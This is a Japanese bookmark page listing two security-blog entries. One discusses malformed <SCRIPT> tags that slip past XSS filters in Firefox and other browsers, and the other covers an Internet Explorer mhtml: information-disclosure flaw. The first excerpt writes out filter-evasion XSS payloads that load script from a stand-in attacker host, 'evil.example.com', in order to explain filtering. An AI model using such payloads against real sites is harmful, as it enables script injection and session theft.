タグ

ブックマーク / hoshikuzu.hatenadiary.org (2)

  • hoshikuzu | star_dust の書斎 - XSS模擬アタック出題編

    <SCRIPT/!#$%&()*~+-_.,:;?@[/|\]^`=''SRC!#$%&()*~+-_.,:;?@[/|\]^`='http://evil.example.com/xss.js'></SCRIPT>こんな畸形例がFirefoxで通るらしい。"<SCRIPT\s" != "<SCRIPT/XSS\s" とかどころじゃないので正しくフィルタリングしようねというお話し、ということでいいのかな? Rsnake氏、FirefoxのHTML parser を読んで発見したらしい。 <SCRIPT/=''SRC='http://evil.example.com/xss.js'></SCRIPT>ちなみに上は前から時々気になっていた畸形例。IE,FF,O9で作動。実用性がほんのちょっとだけあるけど出番はめったにない。 遊びでCGIを作りました。XSS脆弱性があります。模擬アタックをかけてみ

    hoshikuzu | star_dust の書斎 - XSS模擬アタック出題編
  • ■ - hoshikuzu | star_dust の書斎

    CSSXSS脆弱性よりもっとヤバイ脆弱性がIEに発見されたようですね そのうち整理され、まとまった情報が日語で出ることでしょうけれど。とりあえず。 Secunia - Advisories - Internet Explorer "mhtml:" Redirection Disclosure of Sensitive Information Secunia - Internet Explorer Arbitrary Content Disclosure Vulnerability Test CSSXSS脆弱性と同じ方向性のIEの脆弱性が発見され、実証コードがSecuniaでデモンストレーションされています。 このことによりログイン中の人でないと閲覧できないはずの情報が、罠ページを踏むことで悪意ある者に盗まれます。セッション管理にも影響あり。最悪乗っ取りまで考えられるかも… mhtml

    ■ - hoshikuzu | star_dust の書斎
  • 1